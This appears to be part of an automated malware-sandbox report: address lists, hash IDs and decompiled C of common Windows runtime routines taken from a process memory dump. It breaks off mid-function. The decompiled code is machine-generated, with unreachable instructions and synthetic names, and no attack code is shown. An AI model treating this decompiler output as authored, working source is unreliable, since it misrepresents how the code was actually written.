0x00e32986
0x00e32987
0x00e32988
0x00e32989
0x00e3298a
0x00e3298b
0x00e3298c
0x00e3298d
0x00e3298e
0x00e3298f
0x00e32990
0x00e32992
0x00e32997
0x00e329a3
0x00e329a6
0x00e329ab
0x00e329ad
0x00e329b0
0x00e329b2
0x00e75c80
0x00e329b8
0x00e329b8
0x00e329bb
0x00e329c0
0x00e329c5
0x00e329c6
0x00e329c6
0x00e329c9
0x00e329cb
0x00000000
0x00000000
0x00e329cd
0x00e329d0
0x00e329d9
0x00e329db
0x00e329dd
0x00e32a7f
0x00e32a84
0x00e32a87
0x00e32a89
0x00e75ca1
0x00e75ca3
0x00000000
0x00e32a8f
0x00e32a8f
0x00000000
0x00e32a8f
0x00000000
0x00e329e3
0x00e329e3
0x00e329e3
0x00000000
0x00e329e3
0x00e329dd
0x00000000
0x00e329db
0x00e329e6
0x00e329e9
0x00e329eb
0x00e329ed
0x00e329f3
0x00e329f5
0x00e329f8
0x00e329fa
0x00e32a97
0x00e32a9a
0x00e32a9d
0x00e32add
0x00000000
0x00e32a9f
0x00e32aa2
0x00e32aa5
0x00e32aa8
0x00e32aab
0x00e75cab
0x00e75caf
0x00e75cc5
0x00e75cda
0x00e75cdc
0x00e75cdf
0x00e75ce5
0x00000000
0x00e75ceb
0x00e75ced
0x00e75cee
0x00000000
0x00e75cee
0x00e75cb1
0x00e75cb4
0x00e75cb9
0x00e75cbb
0x00000000
0x00e75cbd
0x00e75cbd
0x00000000
0x00e75cbd
0x00e75cbb
0x00e32ab1
0x00e32ab1
0x00e32ac4
0x00e32ac6
0x00e32ac6
0x00000000
0x00e32ac6
0x00e32aab
0x00000000
0x00e32a00
0x00e32a09
0x00e32a0e
0x00e32a21
0x00e32a24
0x00e32a35
0x00e32a3a
0x00e32a3d
0x00e32a42
0x00e32a59
0x00e32a59
0x00e32a5c
0x00e32a5f
0x00e32a5f
0x00e329fa
0x00e329f3
0x00e32a64
0x00e32a64
0x00e32a6b
0x00e32a6b
0x00e32a6d
0x00e32a72
0x00e32a72
0x00000000

Strings

PATH, xrefs: 00E32642, 00E32691

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 8aed54e5c17a9cafc0c8ded06ce61341788a6202e310242280ed3533b0a19713
Instruction ID: bd92af3797e4527cd9470d82c9d9484d3ce796e6255c602a8a8bd73a29cd80ae
Opcode Fuzzy Hash: 8aed54e5c17a9cafc0c8ded06ce61341788a6202e310242280ed3533b0a19713
Instruction Fuzzy Hash: 8DC18D71E002199FCB25DF99D885BFDBBB1FF48704F14502AEA81BB250D774A941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E3FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00E3FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E00E1EEF0(0xef7b60);
					_t134 =  *0xef7b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0xef7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0xef7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E00E16D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E00E176E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E00EA8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E00E0B150();
													}
													_t116 = E00EA6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E00E175CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0xef8638; // 0x0
																	_t122 = L00E138A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E00E176E2(_t154);
																			goto L41;
																		}
																	} else {
																		E00E176E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L00E3FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L00E170F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E00E3FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E00E3FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E00E3FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E00E3FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E00E3FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0xef7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0xef7b84 = _t75;
						_t73 = E00E1EB70(_t134, 0xef7b60);
						if( *0xef7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E00E1FF60( *0xef7b20);
							}
						}
						goto L5;
					}
				}
			}

0x00e3fab0
0x00e3fab2
0x00e3fab3
0x00e3fab4
0x00e3fabc
0x00e3fac0
0x00e3fb14
0x00e3fb17
0x00e3fac2
0x00e3fac8
0x00e3facd
0x00e3fad3
0x00e3fad3
0x00e3fadd
0x00e3fb18
0x00e3fb1b
0x00e3fb1d
0x00e3fb1e
0x00e3fb1f
0x00e3fb20
0x00e3fb21
0x00e3fb22
0x00e3fb23
0x00e3fb24
0x00e3fb25
0x00e3fb26
0x00e3fb27
0x00e3fb28
0x00e3fb29
0x00e3fb2a
0x00e3fb2b
0x00e3fb2c
0x00e3fb2d
0x00e3fb2e
0x00e3fb2f
0x00e3fb3a
0x00e3fb3b
0x00e3fb3e
0x00e3fb41
0x00e3fb44
0x00e3fb47
0x00e3fb4a
0x00e3fb4d
0x00e3fb53
0x00e7bdcb
0x00e7bdcb
0x00e3fb59
0x00e3fb5b
0x00e3fb5b
0x00e3fb5e
0x00e7bdd5
0x00e7bdd8
0x00000000
0x00e7bdda
0x00000000
0x00e7bdda
0x00e3fb64
0x00e3fb64
0x00e3fb64
0x00e3fb67
0x00e3fb6e
0x00e3fb70
0x00e3fb72
0x00000000
0x00e3fb78
0x00e3fb7a
0x00e3fb7a
0x00e3fb7d
0x00e3fb80
0x00e7bddf
0x00e7bde1
0x00000000
0x00e7bde3
0x00000000
0x00e7bde3
0x00e3fb86
0x00e3fb86
0x00e3fb86
0x00e3fb8b
0x00e3fb90
0x00e3fb92
0x00e3fb94
0x00e3fb9a
0x00e3fb9b
0x00e3fba1
0x00e7bde8
0x00e7bdeb
0x00e7bded
0x00e7beb5
0x00e7beb5
0x00e7bebb
0x00e7bebd
0x00e7bec3
0x00e7bed2
0x00e7bedd
0x00e7bedd
0x00e7beed
0x00000000
0x00e7bdf3
0x00e7bdfe
0x00e7be06
0x00e7be0b
0x00e7be0d
0x00e7be0f
0x00e7be14
0x00e7be19
0x00e7be20
0x00e7be25
0x00e7be27
0x00e7be35
0x00e7be39
0x00e7be46
0x00e7be4f
0x00e7be54
0x00e7be56
0x00e7bef8
0x00e7bef8
0x00000000
0x00e7be5c
0x00e7be5c
0x00e7be60
0x00000000
0x00e7be66
0x00e7be66
0x00e7be7f
0x00e7be84
0x00e7be87
0x00e7be89
0x00e7be8b
0x00e7be99
0x00e7be9d
0x00e7bea0
0x00e7beac
0x00e7beaf
0x00e7beb1
0x00e7beb3
0x00e7beb3
0x00000000
0x00e7bea2
0x00e7bea2
0x00000000
0x00e7bea2
0x00e7be8d
0x00e7be8d
0x00e7be92
0x00000000
0x00e7be92
0x00e7be8b
0x00e7be60
0x00e7be3b
0x00e7be3b
0x00e7be3e
0x00000000
0x00e7be40
0x00e7be40
0x00e7be44
0x00000000
0x00000000
0x00000000
0x00000000
0x00e7be44
0x00e7be3e
0x00e7be29
0x00e7be29
0x00000000
0x00e7be29
0x00e7be27
0x00000000
0x00e3fba7
0x00e3fba7
0x00e3fbab
0x00e7bf02
0x00e3fbb1
0x00e3fbb1
0x00e3fbb8
0x00e3fbbd
0x00e3fbbd
0x00e3fbbf
0x00e3fbbf
0x00e3fbc5
0x00e3fbcb
0x00e3fbf8
0x00e3fbf8
0x00e3fbfa
0x00000000
0x00e3fc00
0x00e3fc00
0x00e3fc03
0x00000000
0x00e3fc09
0x00e3fc09
0x00e3fc0f
0x00e3fc15
0x00e3fc23
0x00e3fc23
0x00e3fc25
0x00e3fc27
0x00e3fc75
0x00e3fc7c
0x00e3fc84
0x00000000
0x00e3fc29
0x00e3fc29
0x00e3fc2d
0x00e3fc30
0x00e7bf0f
0x00000000
0x00e3fc36
0x00e3fc38
0x00e3fc3b
0x00e3fc41
0x00e7bf17
0x00e7bf19
0x00e7bf48
0x00e7bf4b
0x00000000
0x00e7bf1b
0x00e7bf22
0x00e7bf24
0x00e7bf26
0x00000000
0x00e7bf2c
0x00e7bf37
0x00e7bf39
0x00e7bf3b
0x00000000
0x00e7bf41
0x00e7bf41
0x00e7bf41
0x00e7bf41
0x00e7bf45
0x00000000
0x00e7bf45
0x00e7bf3b
0x00e7bf26
0x00000000
0x00e3fc47
0x00e3fc47
0x00e3fc49
0x00e3fcb2
0x00e3fcb4
0x00e3fcb6
0x00e3fcdc
0x00e3fcdc
0x00000000
0x00e3fcb8
0x00e3fcc3
0x00e3fcc5
0x00e3fcc7
0x00000000
0x00e3fcc9
0x00e3fcc9
0x00e3fccd
0x00000000
0x00e3fccd
0x00e3fcc7
0x00000000
0x00e3fc4b
0x00e3fc4b
0x00e3fc4e
0x00e3fc4e
0x00e3fc51
0x00e3fc51
0x00e3fc54
0x00e3fc5a
0x00e3fc5c
0x00e3fc5f
0x00e3fc61
0x00e3fc63
0x00e3fc65
0x00e3fc67
0x00e3fc6e
0x00e3fc72
0x00e3fc72
0x00e3fc72
0x00e3fc72
0x00e3fc67
0x00e3fc61
0x00000000
0x00e3fc5a
0x00e3fc49
0x00e3fc41
0x00e3fc30
0x00e3fc27
0x00e3fc03
0x00e3fbcd
0x00e3fbd3
0x00e3fbd9
0x00e3fbdc
0x00e3fbde
0x00e3fc99
0x00e3fc9b
0x00e3fc9d
0x00e3fcd5
0x00e3fcd5
0x00e3fc89
0x00e3fc89
0x00000000
0x00e3fc9f
0x00e3fc9f
0x00e3fca3
0x00000000
0x00e3fca3
0x00000000
0x00e3fbe4
0x00e3fbe4
0x00e3fbe4
0x00e3fbe4
0x00e3fbe9
0x00e3fbf2
0x00000000
0x00e3fbf2
0x00e3fbde
0x00e3fbcb
0x00e3fbab
0x00e3fc8b
0x00e3fc8b
0x00e3fc8c
0x00e3fb80
0x00e3fb72
0x00e3fb5e
0x00e3fc8d
0x00e3fc91
0x00e3fadf
0x00e3fadf
0x00e3fae1
0x00e3fae4
0x00e3fae7
0x00e3faec
0x00e3faf8
0x00e3fb00
0x00e3fb07
0x00e3fb0f
0x00e3fb0f
0x00e3fb07
0x00000000
0x00e3faf8
0x00e3fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00E7BE0F

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: f5e7a7cd3e67e60f7297739c48b74b1e088a34c4bc008cece6623befd5ca0746
Instruction ID: 6752854a11928dec1dc46c6ee418f8bd5ce89295b8b36a5117db18c311bed98c
Opcode Fuzzy Hash: f5e7a7cd3e67e60f7297739c48b74b1e088a34c4bc008cece6623befd5ca0746
Instruction Fuzzy Hash: 5DA1E171F006098FDB25DB68C858BBABBA5AB48714F14A579E946FB781DB30DC41CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00E02D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00E02D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0xef5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0xef7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E00E497C0();
				}
				if( *0xef79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0xef79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E00E31624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E00E27D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E00E9FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E00E49520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E00E3E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L00E5DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0xef6901;
								_push(_t109);
								_v52 = _t98;
								if( *0xef6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E00E49980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E00E495D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E00E27D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E00E27D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E00E87016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E00E9FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0xef5350;
							if(_t109 != 0xef5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E00E9FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E00E95720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x00e02d8a
0x00e02d8a
0x00e02d92
0x00e02d96
0x00e02d9e
0x00e02da0
0x00e02da3
0x00e02da5
0x00e02da8
0x00e02dab
0x00e02db2
0x00e5f9aa
0x00e5f9ab
0x00e5f9ae
0x00e5f9ae
0x00e02db8
0x00e02dc2
0x00e5f9b9
0x00e5f9be
0x00e5f9bf
0x00e5f9bf
0x00e02dcf
0x00e5f9c9
0x00e02dd5
0x00e02dd5
0x00e02dd5
0x00e02dde
0x00e02de1
0x00e02e70
0x00e02e72
0x00e02e72
0x00e02de7
0x00e02deb
0x00e02e7c
0x00e02e83
0x00e02e85
0x00e02e8b
0x00e02e8d
0x00e02e92
0x00e02e92
0x00e02e85
0x00e02df1
0x00e02df7
0x00e02df9
0x00e02df9
0x00e02dfc
0x00e02dff
0x00e02e02
0x00000000
0x00e02e05
0x00e02e0c
0x00e5f9d9
0x00e02e12
0x00e02e12
0x00e02e12
0x00e02e1a
0x00e5f9e3
0x00e5f9e9
0x00e5f9f0
0x00e5f9f6
0x00e5f9f8
0x00e5f9f8
0x00e5f9f0
0x00e02e23
0x00e5fa02
0x00e5fa03
0x00e5fa05
0x00e5fa06
0x00000000
0x00e02e29
0x00e02e29
0x00e02e2e
0x00e02e34
0x00e02e3e
0x00000000
0x00000000
0x00e02e44
0x00e02e47
0x00e02e4d
0x00000000
0x00000000
0x00e02e4f
0x00e02e54
0x00000000
0x00000000
0x00e02e5a
0x00e02e5f
0x00e02e9a
0x00e02ea4
0x00e02ea5
0x00e02ea8
0x00e02eaf
0x00e02eb2
0x00e02eb5
0x00e5fae9
0x00e5faeb
0x00e5faed
0x00e5faef
0x00e5faf7
0x00e5faf8
0x00e5fafd
0x00e5faff
0x00e5fb04
0x00e5fb04
0x00e5faff
0x00e02ec0
0x00e02ec4
0x00e02ec6
0x00e02ec8
0x00e5fb14
0x00e5fb18
0x00e5fb1e
0x00e5fb21
0x00e5fb21
0x00e02ece
0x00e02ece
0x00e02ece
0x00e02ed7
0x00e02e61
0x00e02e63
0x00e5fa6b
0x00e5fa71
0x00e5fa76
0x00e5fa78
0x00e5fa8a
0x00e5fa7a
0x00e5fa83
0x00e5fa83
0x00e5fa8f
0x00e5fa91
0x00e5fa97
0x00e5fa9d
0x00e5faa4
0x00e5faaa
0x00e5faaf
0x00e5fab1
0x00e5fac3
0x00e5fab3
0x00e5fabc
0x00e5fabc
0x00e5fac8
0x00e5facb
0x00e5fadf
0x00e5fadf
0x00e5facb
0x00e5faa4
0x00e5fa91
0x00e02e6f
0x00e02e6f
0x00e02e5f
0x00e5fa13
0x00e5fa15
0x00e5fa17
0x00e5fa1f
0x00e5fa21
0x00e5fa22
0x00e5fa25
0x00e5fa28
0x00e5fa2f
0x00e5fa2f
0x00e5fa2a
0x00e5fa2a
0x00e5fa2a
0x00e5fa31
0x00e5fa34
0x00e5fa36
0x00e5fa3c
0x00e5fa3e
0x00e5fa41
0x00e5fa43
0x00e5fa45
0x00e5fa45
0x00e5fa41
0x00e5fa3c
0x00e5fa4a
0x00e5fa4f
0x00e5fa51
0x00e5fa53
0x00e5fa56
0x00e5fa5b
0x00e5fa5e
0x00000000
0x00e5fa5e
0x00e02e23

Strings

RTL: Re-Waiting, xrefs: 00E5FA4A

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 9b02073095e5300b63d63dea2e43ee7c2d9fe0ba0e5d3a80566cf158b0b69983
Instruction ID: 2ea41dfaf31c64041963ceb296c4c3e1ad28a75c4064387d92e5e9336528ab23
Opcode Fuzzy Hash: 9b02073095e5300b63d63dea2e43ee7c2d9fe0ba0e5d3a80566cf158b0b69983
Instruction Fuzzy Hash: 1B614931A006059FDB32DF68C849BBE77E5EB40318F242A79EA55B72C2C7349D85C792

Uniqueness

Uniqueness Score: -1.00%

Function 00ED0EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00ED0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E00ECFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E00ED1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E00E49730();
					_t115 = _v64;
